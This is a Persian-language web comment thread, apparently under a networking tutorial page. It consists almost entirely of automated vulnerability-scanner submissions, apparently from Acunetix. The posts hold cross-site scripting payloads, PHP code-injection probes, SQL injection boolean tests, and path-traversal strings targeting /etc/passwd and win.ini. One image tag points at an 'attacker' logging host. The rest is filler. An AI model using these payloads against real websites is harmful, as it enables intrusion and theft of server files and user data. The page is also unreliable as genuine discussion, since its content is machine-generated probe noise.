bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۱نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%8714-WAPs-and-Placement

dxhjlvhw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۱نوشت:

1

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۱نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۱نوشت:

1

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۲نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%8714-WAPs-and-Placement/.

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۲نوشت:

WEB-INF\\web.xml?

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۲نوشت:

1

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۲نوشت:

1

http://hithexfh8I5WH.bxss.me/ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۲نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۳نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۳نوشت:

1

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۳نوشت:

1

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۳نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۴نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۴نوشت:

1

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۴نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۴نوشت:

1

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۴نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۵نوشت:

1'"

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۵نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۵نوشت:

1

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۵نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۵نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۵نوشت:

\\

;print(md5(acunetix_wvs_security_test)); در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۶نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۶نوشت:

1

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۷نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۸نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%8714-WAPs-and-Placement در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۹نوشت:

1

';print(md5(acunetix_wvs_security_test));$a=' در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۹نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۹نوشت:

1

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%8714-WAPs-and-Placement در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۹نوشت:

1

";print(md5(acunetix_wvs_security_test));$a=" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۰نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۰نوشت:

@@ZEUQR

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%8714-WAPs-and-Placement/. در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۱نوشت:

1

${@print(md5(acunetix_wvs_security_test))} در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۱نوشت:

1

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۲نوشت:

www.vulnweb.com

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۲نوشت:

JyI=

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۲نوشت:

1

ifqlrfji در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۲نوشت:

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۲نوشت:

1

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۳نوشت:

http://www.vulnweb.com

${@print(md5(acunetix_wvs_security_test))}\\ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۳نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۳نوشت:

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۳نوشت:

1

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۴نوشت:

//www.vulnweb.com

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۴نوشت:

1

xekiglde در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۴نوشت:

'"

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۵نوشت:

ifqlrfji در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۵نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۵نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۵نوشت:

1

xekiglde در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۵نوشت:

<!--

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۵نوشت:

/\\www.vulnweb.com

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۶نوشت:

(select convert(int,CHAR(65)))

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۶نوشت:

1

xekiglde در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۶نوشت:

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۶نوشت:

1

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۶نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۶نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۷نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۷نوشت:

1

xekiglde در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۷نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1'"()&%<acx><ScRiPt >prompt(901311)</ScRiPt>

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۷نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۸نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۸نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۸نوشت:

'"()&%<acx><ScRiPt >prompt(933300)</ScRiPt>

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۸نوشت:

1

'" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۹نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۹نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۴۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1_959095

<!-- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۰نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۰نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۰نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۰نوشت:

1

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۰نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۰نوشت:

acu1619<s1﹥s2ʺs3ʹuca1619

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۱نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۱نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۱نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۲نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۲نوشت:

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۲نوشت:

1

kwrmlkmt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۲نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۲نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۳نوشت:

1

www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۳نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۴نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۴نوشت:

acu179%6xuca179AAAAA

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۴نوشت:

1

http://www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۴نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۴نوشت:

1

pubqtaol در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۵نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۵نوشت:

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۵نوشت:

1

//www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۵نوشت:

1

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۵نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۶نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۶نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt >prompt(926675)</ScRiPt>

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۶نوشت:

1

1'" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۶نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۷نوشت:

TicketBtn=ثبت نظر<script>prompt(926030)</script>

/\\www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۷نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۷نوشت:

1

\\ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۷نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۸نوشت:

TicketBtn=ثبت نظر<ScR<ScRiPt>IpT>prompt(911474)</sCr<ScRiPt>IpT>

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۸نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۸نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۸نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt >prompt(922245)</ScRiPt>

@@wfpci در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۹نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۵۹نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۰نوشت:

1

JyI= در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۰نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947951></ScRiPt>

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۰نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۱نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۲نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<\0ScRiPt >prompt(935527)</ScRiPt>

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۲نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۲نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۳نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۳نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<video><source onerror="javascript:prompt(957156)">

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۳نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۴نوشت:

1

(select convert(int,CHAR(65))) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۴نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۴نوشت:

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۴نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۵نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۵نوشت:

TicketBtn%3D%25d8%25ab%25d8%25a8%25d8%25aa%2520%25d9%2586%25d8%25b8%25d8%25b1%3Csvg%20onload%3Dprompt(917668)%3E

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۵نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۶نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<div style=width:expression(prompt(967718))>

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۶نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۶نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='979117'>

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۷نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۷نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<body onload=prompt(965511)>

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۸نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۸نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929526)>

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۸نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img src=xyz OnErRor=prompt(913918)>

../../../../../../../../../../etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۰۹نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img/src=">" onerror=alert(920613)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۰نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۱نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۱نوشت:

TicketBtn%3d%25d8%25ab%25d8%25a8%25d8%25aa%2520%25d9%2586%25d8%25b8%25d8%25b1<ScRiPt%20>prompt(932197)</sCripT>

../../../../../../../../../../etc/passwd\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۲نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۲نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt>prompt(914822)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۳نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۳نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۳نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۴نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۴نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۴نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<input autofocus onfocus=prompt(911019)>

/../..//../..//../..//../..//../..//etc/passwd\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۵نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۵نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۵نوشت:

<a HrEF=http://www.vulnweb.com></a>

.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۵نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۶نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۶نوشت:

<a HrEF=jaVaScRiPT:>

/etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۶نوشت:

1

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۶نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۷نوشت:

[url=http://www.vulnweb.com][/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۷نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img<!-- --> src=x onerror=alert(913194);//><!-- -->

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۸نوشت:

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۸نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1}body{acu:Expre/**/SSion(prompt(969179))}

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1_tcmgg <ScRiPt >prompt(958916)</ScRiPt>

-1 OR 2+549-549-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۹نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۱۹نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ifRAme sRc=907288.com></IfRamE>

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۰نوشت:

1

-1 OR 3+549-549-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۰نوشت:

1

haqgyonw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img sRc='http://attacker-968169/log.php?

umexjbos در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۲نوشت:

1

file:///etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۲نوشت:

1

umexjbos در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۲نوشت:

1

-1 OR 3*2<(0+5+549-549) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۲نوشت:

1

/\\../\\../\\../\\../\\../\\../\\../etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۳نوشت:

1

umexjbos در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۳نوشت:

1

-1 OR 3*2>(0+5+549-549) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۳نوشت:

1

WEB-INF/web.xml در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۴نوشت:

1

sample%40email.tst'"()&%<acx><ScRiPt >prompt(923000)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۴نوشت:

1

WEB-INF\\web.xml در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۵نوشت:

1

'"()&%<acx><ScRiPt >prompt(947180)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۵نوشت:

1

-1 OR 2+809-809-1=0+0+0+1 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۵نوشت:

1

../../../../../../../../../../windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۶نوشت:

1

sample%40email.tst_982902 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۶نوشت:

1

../../../../../../../../../../boot.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۷نوشت:

1

-1 OR 3+809-809-1=0+0+0+1 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۷نوشت:

1

../../../../../../../../../../windows/win.ini\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۸نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۹نوشت:

1

-1 OR 3*2<(0+5+809-809) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۹نوشت:

1

acu9297<s1﹥s2ʺs3ʹuca9297 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۲۹نوشت:

1

................windowswin.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۰نوشت:

1

-1 OR 3*2>(0+5+809-809) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۰نوشت:

1

..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۰نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۱نوشت:

1

/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۲نوشت:

1

-1' OR 2+922-922-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۲نوشت:

1

acu189%6xuca189AAAAA در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۲نوشت:

1

